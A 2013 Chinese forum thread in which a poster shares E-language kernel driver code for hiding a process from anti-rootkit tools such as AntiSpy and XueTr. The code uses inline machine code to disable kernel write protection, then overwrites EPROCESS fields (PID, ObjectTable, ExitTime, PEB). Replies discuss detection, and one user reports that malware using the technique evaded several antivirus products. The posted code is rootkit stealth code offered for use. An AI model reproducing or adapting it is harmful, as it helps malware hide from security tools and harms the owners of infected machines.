呵呵无聊发个隐藏进程的东西，目前antispy，xuetr等很多ark工具不能检测,发布代码!

benlvan

PS：楼主直接把你的驱动文件代码贴出来吧，E文件用notepad根本打不开。

lpmjknj

benlvan 发表于 2013-4-6 08:12
PS：楼主直接把你的驱动文件代码贴出来吧，E文件用notepad根本打不开。

.版本 2

.子程序 Write_SSDT, , , //写内存
.参数 To, 整数型, , //地址
.参数 From, 整数型, , //写入数据

置入代码 ({ 96, 139, 117, 8, 139, 125, 12, 250, 15, 32, 192, 53, 0, 0, 1, 0, 15, 34, 192, 137, 62, 15, 32, 192, 53, 0, 0, 1, 0, 15, 34, 192, 251, 97, 201, 195 }) // _asm


.版本 2

.如果真 (控制码＝ 1996)
    .如果真 (PID ≠ 0)
        PsLookupProcessByProcessId (参数.PID, EProcess)
        Write_SSDT (EProcess ＋ 132, -1)//pid
        Write_SSDT (EProcess ＋ 196, 0)//ObjectTable
        Write_SSDT (EProcess ＋ 120, 4)//ExitTime
        Write_SSDT (EProcess ＋ 432, 0)//peb
        Write_SSDT (EProcess, 0)//keprocess

hu3167343

http://bbs.pediy.com/showthread.php?t=151713
其实你这个方法我在差不多一年前就已经发过了，所以AntiSpy本身是不会判断ExitTime的。
至于修改PID啥啥的，下个版本改进下，加个显示可疑进程，呵呵。

hu3167343

大家都很早啊，哈哈。

aiping

楼主qq上很多cf网友，哈哈，楼主喜欢这游戏

shui_shen

神马

yjwfdc

lpmjknj 发表于 2013-4-5 16:44
额另外附上易语言写驱动教程和例子
http://bbs.eyuyan.com/read.php?tid=208274

多谢楼主 这样的才是技术贴，特别是开源就更是好贴。

3801187

被费尔报毒

小v可

benlvan 发表于 2013-4-5 21:52
我在2010年初写的一个“无驱动玩具ARK”能检测到真实PID：

XT结束不了估计是因为修改了EPROCESS结构的什 ...

求下载地址  大牛~~~

暗夜死灵

hu3167343 发表于 2013-4-6 08:57
http://bbs.pediy.com/showthread.php?t=151713
其实你这个方法我在差不多一年前就已经发过了，所以AntiSp ...

- -。
我朋友的电脑中了这东西。。用Wsyscheck的确能看到。
没多想就结束了，再看时仍然存在，但一重启就没了。
过360……QQ管家....诺顿....AVG.....
病毒利用这东西……危险了。